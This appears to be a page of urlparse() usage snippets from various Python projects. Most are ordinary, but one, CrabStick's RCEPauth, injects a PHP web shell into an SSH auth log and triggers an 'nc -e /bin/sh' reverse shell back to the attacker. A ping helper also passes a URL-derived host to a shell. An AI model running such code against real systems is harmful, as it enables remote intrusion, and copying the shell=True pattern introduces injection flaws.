Python urllib.parse 模块,urlparse() 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用urllib.parse.urlparse()

项目:faceless    作者:LiuRoy    | 项目源码 | 文件源码
def ygdy8_list_page(url, is_index=False):
    """???????????

    Args:
        url (string): url
        is_index (bool): ??????
    """
    celery_logger.info('ygdy8_list_page url: {}'.format(url))

    try:
        u = urlparse(url)
        response = requests.get(url, headers={'Host': u.netloc})
        html_page = response.content.decode('gbk', 'ignore')

        movies, pages = ygdy8.parse_list_page(html_page, is_index)
        for movie in movies:
            movie_url = '{}://{}{}'.format(u.scheme, u.netloc, movie)
            ygdy8_movie_page.delay(movie_url)

        dir_name = os.path.dirname(u.path)
        for page in pages[1:]:
            page_url = '{}://{}{}/{}'.format(u.scheme, u.netloc, dir_name, page)
            ygdy8_list_page.delay(page_url, False)
    except Exception as exc:
        celery_logger.exception(exc)
项目:faceless    作者:LiuRoy    | 项目源码 | 文件源码
def ygdy8_movie_page(url):
    """?????ygdy8?????

    Args:
        url (string): ????(eg: http://www.ygdy8.net/html/gndy/jddy/20170804/54635.html)
    """
    celery_logger.info('ygdy8_movie_page url: {}'.format(url))

    try:
        sid = calc_md5(url.encode('utf8'))
        record = Entity.get(sid)
        if record:
            return

        u = urlparse(url)
        response = requests.get(url, headers={'Host': u.netloc})
        html_page = response.content.decode('gbk', 'ignore')
        movie = ygdy8.YGDY8(html_page)
        movie.parse_html()

        save_ygdy8_data.delay(sid, url, movie.to_json())
    except Exception as exc:
        celery_logger.exception(exc)
项目:faceless    作者:LiuRoy    | 项目源码 | 文件源码
def s80_movie_list(url):
    """?????80s

    Args:
        url (string): url
    """
    celery_logger.info('s80_movie_list url: {}'.format(url))

    try:
        u = urlparse(url)
        response = requests.get(url, headers={'Host': u.netloc})

        movies, next_page = s80.parse_list_page(response.text)
        for movie in movies:
            movie_url = '{}://{}{}'.format(u.scheme, u.netloc, movie)
            s80_movie_page.delay(movie_url)

        if next_page:
            next_page_url = '{}://{}{}'.format(u.scheme, u.netloc, next_page)
            s80_movie_list.delay(next_page_url)
    except Exception as exc:
        celery_logger.exception(exc)
项目:pbtk    作者:marin-m    | 项目源码 | 文件源码
def prompt_extractor(self, item):
        extractor = extractors[item.data(Qt.UserRole)]
        inputs = []
        if not assert_installed(self.view, **extractor.get('depends', {})):
            return

        if not extractor.get('pick_url', False):
            files, mime = QFileDialog.getOpenFileNames()
            for path in files:
                inputs.append((path, Path(path).stem))
        else:
            text, good = QInputDialog.getText(self.view, ' ', 'Input an URL:')
            if text:
                url = urlparse(text)
                inputs.append((url.geturl(), url.netloc))

        if inputs:
            wait = QProgressDialog('Extracting .proto structures...', None, 0, 0)
            wait.setWindowTitle(' ')
            self.set_view(wait)

            self.worker = Worker(inputs, extractor)
            self.worker.progress.connect(self.extraction_progress)
            self.worker.finished.connect(self.extraction_done)
            self.worker.start()
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def make_next_param(login_url, current_url):
    '''
    Reduces the scheme and host from a given URL so it can be passed to
    the given `login` URL more efficiently.

    :param login_url: The login URL being redirected to.
    :type login_url: str
    :param current_url: The URL to reduce.
    :type current_url: str
    '''
    l = urlparse(login_url)
    c = urlparse(current_url)

    if (not l.scheme or l.scheme == c.scheme) and \
            (not l.netloc or l.netloc == c.netloc):
        return urlunparse(('', '', c.path, c.params, c.query, ''))
    return current_url
项目:uzdevsbot    作者:Uzbek-Developers    | 项目源码 | 文件源码
def run_webhook(self, webhook_url, **options):
        """
        Convenience method for running bots in webhook mode

        :Example:

        >>> if __name__ == '__main__':
        >>>     bot.run_webhook(webhook_url="https://yourserver.com/webhooktoken")

        Additional documentation on https://core.telegram.org/bots/api#setwebhook
        """
        loop = asyncio.get_event_loop()
        loop.run_until_complete(self.set_webhook(webhook_url, **options))
        if webhook_url:
            url = urlparse(webhook_url)
            app = self.create_webhook_app(url.path, loop)
            host = os.environ.get('HOST', '0.0.0.0')
            port = int(os.environ.get('PORT', 0)) or url.port
            web.run_app(app, host=host, port=port)
项目:skymod    作者:DelusionalLogic    | 项目源码 | 文件源码
def fetch(self, uri, filename):
        if super().needs_login():
            super().perform_login(self.cfg, self.headers)
        parts = urlparse(uri)
        mod_id = parts.netloc

        session = super().getSession()

        r = session.get(
            "http://www.nexusmods.com/skyrim/Files/download/" + mod_id,
            params={"game_id": "110"},
            allow_redirects=True,
            headers=self.headers
        )
        if r.status_code != 200:
            raise RuntimeError("Failed downloading " + uri)
        j = r.json()
        super().download_file(uri, j[0]["URI"], self.headers, filename)
项目:meg-server    作者:Argonne-National-Laboratory    | 项目源码 | 文件源码
def get_sendgrid_request_message(cfg, keyid, hex, user_email):
    url_prefix = urljoin(
        cfg.config.megserver_hostname_url,
        os.path.join(cfg.config.meg_url_prefix, "revoke")
    )
    params = urlencode([("keyid", keyid), ("token", hex)])
    parsed = list(urlparse(url_prefix))
    parsed[4] = params
    revocation_link = urlunparse(parsed)

    message = Mail()
    message.add_to(user_email)
    message.set_from(cfg.config.sendgrid.from_email)
    message.set_subject(cfg.config.sendgrid.subject)
    message.set_html(EMAIL_HTML.format(keyid=keyid, link=revocation_link))
    return message
项目:post-review    作者:ericforbes    | 项目源码 | 文件源码
def determine_git_domain(origin_url):
        #Handles both SSH and HTTPS
        #No support for relative URL path, only (sub)domain: https://docs.gitlab.com/omnibus/settings/configuration.html

        #HTTPS URLS
        url = urlparse(origin_url)
        if url.netloc:
            return url.netloc

        #SSH URLS
        matchObj = re.search(r'@+(?P<ssh_git_url>.*)?:', origin_url)

        try:
            if matchObj.group('ssh_git_url'):
                return matchObj.group('ssh_git_url')
        except:
            return None
项目:openstack-ansible-plugins    作者:openstack    | 项目源码 | 文件源码
def get_netloc(url):
    """Return the netloc from a URL.

    If the input value is not a value URL the method will raise an Ansible
    filter exception.

    :param url: the URL to parse
    :type url: ``str``
    :returns: ``str``
    """
    try:
        netloc = urlparse(url).netloc
    except Exception as exp:
        raise errors.AnsibleFilterError(
            'Failed to return the netloc of: "%s"' % str(exp)
        )
    else:
        return netloc
项目:openstack-ansible-plugins    作者:openstack    | 项目源码 | 文件源码
def get_netorigin(url):
    """Return the netloc from a URL.

    If the input value is not a value URL the method will raise an Ansible
    filter exception.

    :param url: the URL to parse
    :type url: ``str``
    :returns: ``str``
    """
    try:
        parsed_url = urlparse(url)
        netloc = parsed_url.netloc
        scheme = parsed_url.scheme
    except Exception as exp:
        raise errors.AnsibleFilterError(
            'Failed to return the netorigin of: "%s"' % str(exp)
        )
    else:
        return '%s://%s' % (scheme, netloc)
项目:poco    作者:shiwaforce    | 项目源码 | 文件源码
def check_remote(url):
        # TODO need a better solution
        o = urlparse.urlparse(url)
        host = o.netloc
        while "@" in host:
            host = host[host.find("@")+1:]
        while ":" in host:
            host = host[:host.find(":")]
        cmd = list()
        cmd.append("ping")
        if platform.system().lower().startswith("win"):
            cmd.append("-n")
            cmd.append("1")
            cmd.append("-w")
            cmd.append("1000")
        else:
            cmd.append("-c1")
            cmd.append("-t1")
        cmd.append(host)

        p = Popen(" ".join(cmd), stdout=PIPE, stderr=PIPE, shell=True)
        out, err = p.communicate()

        return len(err) == 0
项目:SoCFoundationFlow    作者:mattaw    | 项目源码 | 文件源码
def configure(self):
    opts = self.options
    use_cfg = opts.use_config
    if use_cfg is None:
        return
    url = urlparse(opts.use_config_dir)
    kwargs = {}
    if url.scheme:
        kwargs['download'] = True
        kwargs['remote_url'] = url.geturl()
        # search first with the exact url, else try with +'/wafcfg'
        kwargs['remote_locs'] = ['', DEFAULT_DIR]
    tooldir = url.geturl() + ' ' + DEFAULT_DIR
    for cfg in use_cfg.split(','):
        Logs.pprint('NORMAL', "Searching configuration '%s'..." % cfg)
        self.load(cfg, tooldir=tooldir, **kwargs)
    self.start_msg('Checking for configuration')
    self.end_msg(use_cfg)
项目:SoCFoundationFlow    作者:mattaw    | 项目源码 | 文件源码
def configure(self):
    opts = self.options
    use_cfg = opts.use_config
    if use_cfg is None:
        return
    url = urlparse(opts.use_config_dir)
    kwargs = {}
    if url.scheme:
        kwargs['download'] = True
        kwargs['remote_url'] = url.geturl()
        # search first with the exact url, else try with +'/wafcfg'
        kwargs['remote_locs'] = ['', DEFAULT_DIR]
    tooldir = url.geturl() + ' ' + DEFAULT_DIR
    for cfg in use_cfg.split(','):
        Logs.pprint('NORMAL', "Searching configuration '%s'..." % cfg)
        self.load(cfg, tooldir=tooldir, **kwargs)
    self.start_msg('Checking for configuration')
    self.end_msg(use_cfg)
项目:SoCFoundationFlow    作者:mattaw    | 项目源码 | 文件源码
def configure(self):
    opts = self.options
    use_cfg = opts.use_config
    if use_cfg is None:
        return
    url = urlparse(opts.use_config_dir)
    kwargs = {}
    if url.scheme:
        kwargs['download'] = True
        kwargs['remote_url'] = url.geturl()
        # search first with the exact url, else try with +'/wafcfg'
        kwargs['remote_locs'] = ['', DEFAULT_DIR]
    tooldir = url.geturl() + ' ' + DEFAULT_DIR
    for cfg in use_cfg.split(','):
        Logs.pprint('NORMAL', "Searching configuration '%s'..." % cfg)
        self.load(cfg, tooldir=tooldir, **kwargs)
    self.start_msg('Checking for configuration')
    self.end_msg(use_cfg)
项目:noc-orchestrator    作者:DirceuSilvaLabs    | 项目源码 | 文件源码
def _should_use_proxy(url, no_proxy=None):
    """Determines whether a proxy should be used to open a connection to the 
    specified URL, based on the value of the no_proxy environment variable.
    @param url: URL
    @type url: basestring or urllib2.Request
    """
    if no_proxy is None:
        no_proxy_effective = os.environ.get('no_proxy', '')
    else:
        no_proxy_effective = no_proxy

    urlObj = urlparse_.urlparse(_url_as_string(url))
    for np in [h.strip() for h in no_proxy_effective.split(',')]:
        if urlObj.hostname == np:
            return False

    return True
项目:aio-service-client    作者:alfred82santa    | 项目源码 | 文件源码
def generate_path(self, endpoint_desc, session, request_params):
        path = endpoint_desc.get('path', '')
        url = list(urlparse(self.base_path))
        url[2] = '/'.join([url[2].rstrip('/'), path.lstrip('/')])
        url.pop()
        path = urlunsplit(url)
        hooks = [getattr(plugin, 'prepare_path') for plugin in self._plugins
                 if hasattr(plugin, 'prepare_path')]
        self.logger.debug("Calling {0} plugin hooks...".format('prepare_path'))
        for func in hooks:
            try:
                path = await func(endpoint_desc=endpoint_desc, session=session,
                                  request_params=request_params, path=path)
            except Exception as ex:  # pragma: no cover
                self.logger.error("Exception executing {0}".format(repr(func)))
                self.logger.exception(ex)
                raise

        return path
项目:CrabStick    作者:Hack-Hut    | 项目源码 | 文件源码
def RCEPauth(temp):
    global port
    global ip
    outTime(2, "Just hit ctrl + c when asked for a password")
    parsed = urlparse(url)

    sysCMD = "ssh" + " '<pre><?php echo system($_GET['cmd']); exit; ?>'@" + parsed.netloc
    print(sysCMD)
    os.system(sysCMD)

    temp = temp.replace('etc/passwd', 'var/log/auth.log&cmd=')
    if not ip:
        ip = input("Enter your IP address:                        : ")
    if not port:
        port = input("Enter local port for target to connect back to: ")
    outTime(3, "Remember to start a listener in another shell")
    input("Hit enter when listen is created")

    cmd = "nc+-e+%2Fbin%2Fsh+" + ip + "+" + port
    try:
        r = openURL(temp + cmd, headers)
        outTime(2, "Shell closed")
        print(65*"-")
    except KeyboardInterrupt:
        sys.exit()
项目:marblecutter    作者:mojodna    | 项目源码 | 文件源码
def __init__(self,
                 table="footprints",
                 database_url=os.getenv("DATABASE_URL"),
                 geometry_column="geom"):
        if database_url is None:
            raise Exception("Database URL must be provided.")
        urlparse.uses_netloc.append('postgis')
        urlparse.uses_netloc.append('postgres')
        url = urlparse.urlparse(database_url)

        self._pool = ThreadedConnectionPool(
            1,
            16,
            database=url.path[1:],
            user=url.username,
            password=url.password,
            host=url.hostname,
            port=url.port)

        self._log = logging.getLogger(__name__)
        self.table = table
        self.geometry_column = geometry_column
项目:hdx-data-freshness    作者:OCHA-DAP    | 项目源码 | 文件源码
def check_urls(self, resources_to_check, results=None, hash_results=None):
        def get_domain(x):
            return urlparse(x[0]).netloc
        if results is None:  # pragma: no cover
            resources_to_check = list_distribute_contents(resources_to_check, get_domain)
            results = retrieve(resources_to_check)
            if self.testsession:
                serialize_results(self.testsession, results)

        hash_check = list()
        for resource_id in results:
            url, err, http_last_modified, hash, force_hash = results[resource_id]
            if hash:
                dbresource = self.session.query(DBResource).filter_by(id=resource_id,
                                                                      run_number=self.run_number).one()
                if dbresource.md5_hash != hash:  # File changed
                    hash_check.append((url, resource_id, force_hash))

        if hash_results is None:  # pragma: no cover
            hash_check = list_distribute_contents(hash_check, get_domain)
            hash_results = retrieve(hash_check)
            if self.testsession:
                serialize_hashresults(self.testsession, hash_results)

        return results, hash_results
项目:sketal    作者:vk-brain    | 项目源码 | 文件源码
def get_url_query(self, url):
        if not isinstance(url, str):
            url = str(url)

        parsed_url = urlparse(url)
        url_query = parse_qsl(parsed_url.fragment or parsed_url.query)

        # login_response_url_query can have multiple key
        url_query = dict(url_query)

        token = self.get_token_from_url(url)
        if token:
            url_query["access_token"] = token

        return url_query

    ############################################################################
项目:aqbot    作者:aqisnotliquid    | 项目源码 | 文件源码
def mdn_cmd(self, listener, sender, target, args):
        arg_list = args.split()

        if len(arg_list) < 1:
            self.messenger.msg(target, "https://developer.mozilla.org/ - Mozilla Developer Network")
            return

        http = urllib3.PoolManager()
        base_url = "https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q="
        mdn_url = "%20site%3Adeveloper.mozilla.org"
        full_url = base_url+args+mdn_url
        o = urlparse(full_url)
        r = http.request("GET", o.geturl())
        pd = json.loads(r.data.decode('UTF-8'))
        firsturl = pd['responseData']['results'][0]['url']
        self.messenger.msg(target, firsturl)
项目:AutoTriageBot    作者:salesforce    | 项目源码 | 文件源码
def sendResponse(reportID: str, actionName: str, respURL: str) -> None:
    if actionName == 'body':
        text = getBody(reportID)
    elif actionName == 'metadata':
        text = getMetadata(reportID)
    else:
        raise ValueError("Button %s not defined!" % actionName)
    ephemeralJson = {'response_type': 'ephemeral',
                     'replace_original': False,
                     'text': text}
    # Even if an attacker gets the verification token, we will still refuse to post the data to non-slack.com URLs
    if urlparse(respURL).hostname.endswith('slack.com'):
        requests.post(respURL, json.dumps(ephemeralJson).encode('utf-8'))
    else:
        ephemeralJson['text'] = (('Failed URL check, respURL=%s which is not on the slack.com domain name! This check '
                                  'is theoretically not required (since we verify the verification token), but done as '
                                  'an extra defensive step. To disable this, edit slackServer.py in the project root.')
                                 % respURL)
        requests.post(respURL, json.dumps(ephemeralJson).encode('utf-8'))
        raise URLError("respURL=%s not on slack.com domain!" % respURL)
项目:AutoTriageBot    作者:salesforce    | 项目源码 | 文件源码
def parseURL(url: str) -> URLParts:
    """ Parse the given URL into a URLParts named tuple and normalize any relevant domain names """
    try:
        parsed = urlparse(url)
        if parsed.hostname:
            hostname = parsed.hostname
        else:
            hostname = ''
        if config.hostnameSanitizers:
            for regex, result in config.hostnameSanitizers.items():
                if re.compile(regex).match(hostname):
                    domain = result
                    break
            else:
                domain = hostname
        else:
            domain = hostname

        return URLParts(domain=domain,
                        path=parsed.path,
                        queries=dict(parse_qsl(parsed.query)))
    except ValueError:
        return None
项目:AutoTriageBot    作者:salesforce    | 项目源码 | 文件源码
def isProgramURL(url: str, acceptAll=True) -> bool:
    """ Whether the given url is a program URL """
    domain = urlparse(url).netloc.split(':')[0].lower()
    if not config.domains:
        return True
    if config.domains or (not acceptAll):
        try:
            ip = socket.gethostbyname(domain)
        except (socket.gaierror, UnicodeError):
            ip = None
        if domain and isinstance(config.domains, list):
            return (any([domain.endswith(hostname.lower()) for hostname in config.domains]) and
                    ip != '127.0.0.1')
        return False
    if acceptAll:
        return True
项目:AutoTriageBot    作者:salesforce    | 项目源码 | 文件源码
def getVulnDomains(self) -> List[str]:
        """  Get a list of the vulnerable domains (used for duplicate detection-not an accurate process) """
        def getDomains(urls: List[str]) -> List[str]:
            return [urlparse(url).hostname for url in urls]

        botComments = self._getAllCommentsByUsername(config.apiName)
        reporterComments = ([self.__getBody(x) for x in self._getAllCommentsByUsername(self.getReporterUsername())] +
                            getLinks(self.getReportBody()))
        # First attempt at getting a list of vulnerable domains, see if it is ever set in the metadata
        for botComment in botComments:
            body = self.__getBody(botComment)
            try:
                metadataSection = body.split('Metadata')[-1]
                return getDomains([extractJson(metadataSection)['vulnDomain']])
            except (KeyError, TypeError):
                pass
        allURLs = [link for comment in reporterComments for link in getLinks(comment)]
        # If not, just return the list of all the urls
        return getDomains(allURLs)
项目:AlexaPi    作者:alexa-pi    | 项目源码 | 文件源码
def parse_stream_url(self, url):
        logger.debug('Extracting URIs from %s', url)
        extension = urlparse(url).path[-4:]
        if extension in ['.mp3', '.wma']:
            logger.debug('Got %s', url)
            return [url]  # Catch these easy ones
        results = []
        playlist, content_type = self._get_playlist(url)
        if playlist:
            parser = find_playlist_parser(extension, content_type)
            if parser:
                playlist_data = StringIO.StringIO(playlist)
                try:
                    results = [u for u in parser(playlist_data)
                               if u and u != url]
                except Exception as exp:   # pylint: disable=broad-except
                    logger.error('TuneIn playlist parsing failed %s', exp)
                if not results:
                    logger.debug('Parsing failure, '
                                 'malformed playlist: %s', playlist)
        elif content_type:
            results = [url]
        logger.debug('Got %s', results)
        return list(OrderedDict.fromkeys(results))
项目:aioviber    作者:nonamenix    | 项目源码 | 文件源码
def get_app(self, static_serve=False) -> web.Application:
        """
        Create aiohttp application for webhook handling
        """
        app = get_app(self, static_serve=static_serve)

        # webhook handler
        webhook_path = urlparse(self.webhook).path
        app.router.add_post(webhook_path, self.webhook_handle)

        # viber webhooks registering
        if self._unset_webhook_on_cleanup:
            app.on_cleanup.append(lambda a: a.bot.api.unset_webhook())

        if self._set_webhook_on_startup:
            app.on_startup.append(lambda a: a.bot.set_webhook_on_startup())

        return app
项目:Sci-Finder    作者:snverse    | 项目源码 | 文件源码
def check_headers(self, headers):
        etag = headers.get('etag')
        if etag is not None:
            if etag.startswith(('W/', 'w/')):
                if etag.startswith('w/'):
                    warn(HTTPWarning('weak etag indicator should be upcase.'),
                         stacklevel=4)
                etag = etag[2:]
            if not (etag[:1] == etag[-1:] == '"'):
                warn(HTTPWarning('unquoted etag emitted.'), stacklevel=4)

        location = headers.get('location')
        if location is not None:
            if not urlparse(location).netloc:
                warn(HTTPWarning('absolute URLs required for location header'),
                     stacklevel=4)
项目:Sci-Finder    作者:snverse    | 项目源码 | 文件源码
def check_headers(self, headers):
        etag = headers.get('etag')
        if etag is not None:
            if etag.startswith(('W/', 'w/')):
                if etag.startswith('w/'):
                    warn(HTTPWarning('weak etag indicator should be upcase.'),
                         stacklevel=4)
                etag = etag[2:]
            if not (etag[:1] == etag[-1:] == '"'):
                warn(HTTPWarning('unquoted etag emitted.'), stacklevel=4)

        location = headers.get('location')
        if location is not None:
            if not urlparse(location).netloc:
                warn(HTTPWarning('absolute URLs required for location header'),
                     stacklevel=4)
项目:docker-grader    作者:elsys    | 项目源码 | 文件源码
def test_valid_file_upload(admin_client):
    task = Task.objects.create(slug='test')
    data = b"a"

    url = reverse('task', kwargs={'task_id': task.id})

    zip_file = SimpleUploadedFile(
        "task1.zip", data, content_type="application/zip")

    response = admin_client.post(url, {'zip_file': zip_file})
    assert response.status_code == 302
    assert urlparse(response.url).path == url

    submissions = TaskSubmission.objects.all()
    assert len(submissions) == 1

    submission = submissions[0]

    with open(submission.get_submission_path(), 'rb') as f:
        assert data == f.read()
项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def query_params(self, value=None):
        """
        Return or set a dictionary of query params

        :param dict value: new dictionary of values
        """
        if value is not None:
            return URL._mutate(self, query=unicode_urlencode(value, doseq=True))
        query = '' if self._tuple.query is None else self._tuple.query

        # In Python 2.6, urlparse needs a bytestring so we encode and then
        # decode the result.
        if not six.PY3:
            result = parse_qs(to_utf8(query), True)
            return dict_to_unicode(result)

        return parse_qs(query, True)
项目:eea.corpus    作者:eea    | 项目源码 | 文件源码
def dashboard(global_config, **settings):
    """ WSGI entry point for the Flask app RQ Dashboard
    """

    redis_uri = os.environ.get('REDIS_URL', 'redis://localhost:6379/0')
    p = parse.urlparse(redis_uri)
    host, port = p.netloc.split(':')
    db = len(p.path) > 1 and p.path[1:] or '0'

    redis_settings = {
        'REDIS_URL': redis_uri,
        'REDIS_DB': db,
        'REDIS_HOST': host,
        'REDIS_PORT': port,
    }

    app = Flask(__name__,
                static_url_path="/static",
                static_folder=resource_filename("rq_dashboard", "static")
                )
    app.config.from_object(rq_dashboard.default_settings)
    app.config.update(redis_settings)
    app.register_blueprint(rq_dashboard.blueprint)
    return app.wsgi_app
项目:PythonStudyCode    作者:TongTongX    | 项目源码 | 文件源码
def test_auth_url(self):
        perms = ['email', 'birthday']
        redirect_url = 'https://localhost/facebook/callback/'

        expected_url = 'https://www.facebook.com/dialog/oauth?' + urlencode(
            dict(client_id=self.app_id,
                 redirect_uri=redirect_url,
                 scope=','.join(perms)))
        actual_url = facebook.auth_url(self.app_id, redirect_url, perms=perms)

        # Since the order of the query string parameters might be
        # different in each URL, we cannot just compare them to each
        # other.
        expected_url_result = urlparse(expected_url)
        actual_url_result = urlparse(actual_url)
        expected_query = parse_qs(expected_url_result.query)
        actual_query = parse_qs(actual_url_result.query)

        self.assertEqual(actual_url_result.scheme, expected_url_result.scheme)
        self.assertEqual(actual_url_result.netloc, expected_url_result.netloc)
        self.assertEqual(actual_url_result.path, expected_url_result.path)
        self.assertEqual(actual_url_result.params, expected_url_result.params)
        self.assertEqual(actual_query, expected_query)
项目:PyDoc    作者:shaun-h    | 项目源码 | 文件源码
def __getDownloadLink(self, link):
        if link == 'SproutCore.xml':
            data=requests.get('http://docs.sproutcore.com/feeds/' + link).text
            e = xml.etree.ElementTree.fromstring(data)
            version = e.findall('version')[0].text
            for atype in e.findall('url'):
                return {'url': atype.text, 'version':version}
        server = self.serverManager.getDownloadServer(self.localServer)
        data = requests.get(server.url+link).text
        e = xml.etree.ElementTree.fromstring(data)
        version = e.findall('version')[0].text
        for atype in e.findall('url'):
            if not self.localServer == None:
                disassembled = urlparse(atype.text)
                filename, file_ext = splitext(basename(disassembled.path))
                url = self.localServer
                if not url[-1] == '/':
                    url = url + '/'
                url = url + filename + file_ext
                return {'url': url, 'version':version}
            if atype.text.find(server.url) >= 0:
                return {'url': atype.text, 'version':version}
项目:do-portal    作者:certeu    | 项目源码 | 文件源码
def fuzz_one(fqdn):
    original = Fqdn.query.filter_by(fqdn=fqdn).first()
    _url = original.fqdn
    # no scheme, assuming HTTP
    if '://' not in _url:
        _url = 'http://' + _url
    url = urlparse(_url)

    fuzzed = DomainFuzz(url.netloc)
    fuzzed.generate()
    checks = {
        'banners': True,
        'geoip': True,
        'whois': True,
        'ssdeep': True,
        'mxcheck': False
    }

    for domain in fuzzed.domains:
        augment.delay(domain, url, original.id, checks)
项目:radar    作者:amoose136    | 项目源码 | 文件源码
def _isurl(self, path):
        """Test if path is a net location.  Tests the scheme and netloc."""

        # We do this here to reduce the 'import numpy' initial import time.
        if sys.version_info[0] >= 3:
            from urllib.parse import urlparse
        else:
            from urlparse import urlparse

        # BUG : URLs require a scheme string ('http://') to be used.
        #       www.google.com will fail.
        #       Should we prepend the scheme for those that don't have it and
        #       test that also?  Similar to the way we append .gz and test for
        #       for compressed versions of files.

        scheme, netloc, upath, uparams, uquery, ufrag = urlparse(path)
        return bool(scheme and netloc)
项目:ZeroExploit    作者:5alt    | 项目源码 | 文件源码
def get_type(key, value):
    if type(value) == type([]): return 'array'
    value = value[0]
    if value.isdigit(): return 'int'
    try:
        float(value)
        return 'float'
    except:
        pass
    # url check
    u = urlparse.urlparse(value)
    if u.scheme and u.netloc:
        return 'url'
    try:
        j = json.loads(value)
        if type(j) == type([]) or type(j) == type({}):
            return 'json'
    except:
        pass
    return 'str'
项目:weibopy    作者:nooperpudd    | 项目源码 | 文件源码
def test_authorize_url(self):
        """
        :return:
        """

        request_params = {
            'client_id': self.client_id,
            'redirect_uri': self.redirect_url,
            "forcelogin": "false"
        }

        parse_result = parse.urlparse(self.oauth2_client.authorize_url)
        query_params = dict(parse.parse_qsl(parse_result.query))

        self.assertEqual(parse_result.hostname, "api.weibo.com")
        self.assertEqual(parse_result.path, "/oauth2/authorize")

        self.assertDictEqual(query_params, request_params)
项目:peony-twitter    作者:odrling    | 项目源码 | 文件源码
def send_tweet_with_media():
    # read the tweet's status
    status = input("status: ")

    path = ""
    while not path and not os.path.exists(path):
        path = input('file to upload:\n')

    # read the most common input formats
    path = urlparse(path).path.strip(" \"'")

    async with aiofiles.open(path, 'rb') as media:
        # optimize pictures if PIL is available
        if PIL:
            media = await process_media(media, path)

        uploaded = await client.upload_media(media,
                                             chunk_size=2**18,
                                             chunked=True)
        media_id = uploaded.media_id
        await client.api.statuses.update.post(status=status,
                                              media_ids=media_id)
项目:gprime    作者:GenealogyCollective    | 项目源码 | 文件源码
def parse_path(self):
        """
        Returns a 6 tuple-based object with the following items:

        ======== ===   =================================
        Property Pos   Meaning
        ======== ===   =================================
        scheme   0     URL scheme specifier
        netloc   1     Network location part
        path     2     Hierarchical path
        params   3     Parameters for last path element
        query    4     Query component
        fragment 5     Fragment identifier
        ======== ===   =================================
        """
        return urlparse(self.path)
项目:flactory    作者:mehdy    | 项目源码 | 文件源码
def check_template(ctx, _, value):
    """
        Checks the template to be valid template
    :param ctx: app context
    :param value: the parameter value
    :return:
    """
    if not value:
        # TODO: get list and show
        raise ctx.abort()
    else:
        url = urlparse(value)
        if not url.netloc:
            url = url._replace(netloc='github.com')
        if url.path[-4:] == '.git':
            url = url._replace(path=url.path[:-4])
        path = os.path.join(os.environ['HOME'],
                            '.flactory/templates',
                            url.netloc, url.path)
        if os.path.isdir(path):
            return path
        # TODO: if not exist pull it automatically
        repr_name = click.style("[{}] {}".format(url.netloc, url.path[:-4]),
                                bold=True)
        raise ctx.fail(repr_name + " doesn't exist.")
项目:aquests    作者:hansroh    | 项目源码 | 文件源码
def _getresponse(self, resp):
        if resp.status_code == 202:
            status_url = resp.getheader('content-location')
            if not status_url:
                raise Exception('Empty content-location from server')

            status_uri = urlparse(status_url).path
            resource = Resource(uri=status_uri, api=self._api, logger = self._logger).get()
            retries = 0
            MAX_RETRIES = 3
            resp_status = resource.response.status_code

            while resp_status != 303 and retries < MAX_RETRIES:         
                retries += 1
                new_resp.get()
                time.sleep(5)

            if retries == MAX_RETRIES:
                raise Exception('Max retries limit reached without success')

            location = status.conn.getresponse().getheader('location')
            return Resource(uri=urlparse(location).path, api=self._api, logger = self._logger).get()            

        return Response (self, resp)
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def file_to_url(self, file_rel_path):
        """Convert a relative file path to a file URL."""
        _abs_path = os.path.abspath(file_rel_path)
        return urlparse.urlparse(_abs_path, scheme='file').geturl()
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def download(self, source, dest):
        """
        Download an archive file.

        :param str source: URL pointing to an archive file.
        :param str dest: Local path location to download archive file to.
        """
        # propogate all exceptions
        # URLError, OSError, etc
        proto, netloc, path, params, query, fragment = urlparse(source)
        if proto in ('http', 'https'):
            auth, barehost = splituser(netloc)
            if auth is not None:
                source = urlunparse((proto, barehost, path, params, query, fragment))
                username, password = splitpasswd(auth)
                passman = HTTPPasswordMgrWithDefaultRealm()
                # Realm is set to None in add_password to force the username and password
                # to be used whatever the realm
                passman.add_password(None, source, username, password)
                authhandler = HTTPBasicAuthHandler(passman)
                opener = build_opener(authhandler)
                install_opener(opener)
        response = urlopen(source)
        try:
            with open(dest, 'wb') as dest_file:
                dest_file.write(response.read())
        except Exception as e:
            if os.path.isfile(dest):
                os.unlink(dest)
            raise e

    # Mandatory file validation via Sha1 or MD5 hashing.
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def parse_url(self, url):
        return urlparse(url)
项目:wikipedia-crawler    作者:AndreiRegiani    | 项目源码 | 文件源码
def main(initial_url, articles_limit, interval, output_file):
    """ Main loop, single thread """

    minutes_estimate = interval * articles_limit / 60
    print("This session will take {:.1f} minute(s) to download {} article(s):".format(minutes_estimate, articles_limit))
    print("\t(Press CTRL+C to pause)\n")
    session_file = "session_" + output_file
    load_urls(session_file)  # load previous session (if any)
    base_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(initial_url))
    initial_url = initial_url[len(base_url):]
    pending_urls.append(initial_url)

    counter = 0
    while len(pending_urls) > 0:
        try:
            counter += 1
            if counter > articles_limit:
                break
            try:
                next_url = pending_urls.pop(0)
            except IndexError:
                break

            time.sleep(interval)
            article_format = next_url.replace('/wiki/', '')[:35]
            print("{:<7} {}".format(counter, article_format))
            scrap(base_url, next_url, output_file, session_file)
        except KeyboardInterrupt:
            input("\n> PAUSED. Press [ENTER] to continue...\n")
            counter -= 1

    print("Finished!")
    sys.exit(0)
项目:kas    作者:siemens    | 项目源码 | 文件源码
def __getattr__(self, item):
        if item == 'layers':
            if not self._layers:
                return [self.path]
            return [self.path + '/' + l for l in self._layers]
        elif item == 'qualified_name':
            url = urlparse(self.url)
            return ('{url.netloc}{url.path}'
                    .format(url=url)
                    .replace('@', '.')
                    .replace(':', '.')
                    .replace('/', '.')
                    .replace('*', '.'))
项目:charm-swift-proxy    作者:openstack    | 项目源码 | 文件源码
def file_to_url(self, file_rel_path):
        """Convert a relative file path to a file URL."""
        _abs_path = os.path.abspath(file_rel_path)
        return urlparse.urlparse(_abs_path, scheme='file').geturl()
项目:charm-swift-proxy    作者:openstack    | 项目源码 | 文件源码
def download(self, source, dest):
        """
        Download an archive file.

        :param str source: URL pointing to an archive file.
        :param str dest: Local path location to download archive file to.
        """
        # propogate all exceptions
        # URLError, OSError, etc
        proto, netloc, path, params, query, fragment = urlparse(source)
        if proto in ('http', 'https'):
